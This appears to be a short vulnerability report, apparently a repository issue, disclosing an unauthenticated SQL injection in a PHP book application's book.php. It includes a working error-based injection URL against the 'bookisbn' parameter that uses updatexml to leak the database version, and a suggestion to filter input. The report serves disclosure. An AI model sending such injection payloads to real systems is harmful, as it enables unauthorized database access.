Open
Description
version:1.0
No login required.
POC:
http://127.0.0.1:8888/book.php?bookisbn=1' or updatexml(1,concat(0x7e,(version())),0) -- a
View source code book.php

suggest:Please filter input of parameter "bookisbn"
author:zionlab@dbappsecurity.com.cn
Metadata
Metadata
Assignees
Labels
No labels